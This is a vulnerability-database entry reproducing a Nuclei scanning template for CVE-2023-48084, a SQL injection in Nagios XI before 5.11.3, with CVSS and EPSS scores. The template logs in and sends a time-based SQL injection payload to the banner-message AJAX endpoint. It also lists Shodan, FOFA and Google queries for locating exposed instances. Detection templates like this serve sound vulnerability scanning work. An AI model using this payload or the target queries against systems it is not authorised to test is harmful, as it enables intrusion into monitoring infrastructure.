Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-48084
HistoryMay 23, 2024 - 4:46 a.m.

Nagios XI < 5.11.3 - SQL Injection

2024-05-2304:46:59
ProjectDiscovery
github.com
6
cve
nagiosxi
sqlinjection
unauthorizedaccess
patch
upgrade

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.074 Low

EPSS

Percentile

94.1%

SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.
id: CVE-2023-48084

info:
  name: Nagios XI < 5.11.3 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive information.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
  reference:
    - https://github.com/bucketcat/CVE-2023-48084
    - https://github.com/Hamibubu/CVE-2023-48084
    - https://nvd.nist.gov/vuln/detail/CVE-2023-48084
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-48084
    cwe-id: CWE-89
    epss-score: 0.00114
    epss-percentile: 0.44856
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: nagios
    product: nagios_xi
    shodan-query: http.title:"nagios xi"
    fofa-query:
      - title="Nagios XI"
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve,cve2023,nagiosxi,sqli,authenticated,nagios

http:
  - raw:
      - |
        GET /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=

      - |
        @timeout: 15s
        GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration_3>=5'
          - 'contains(body_3, "Home Dashboard</a>")'
        condition: and

    extractors:
      - type: regex
        name: nsp
        part: body
        group: 1
        regex:
          - 'name="nsp" value="(.*)">'
        internal: true
# digest: 4a0a004730450220623f7fb2b34ade32923274720fe9a2b327b9ac34899c696d8ecccdc433721f6e022100e5f82eb99ea3cbe02399c7de0f20d00eb874b79262bc835e67c77a461141c2ca:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.074 Low

EPSS

Percentile

94.1%

Related for NUCLEI:CVE-2023-48084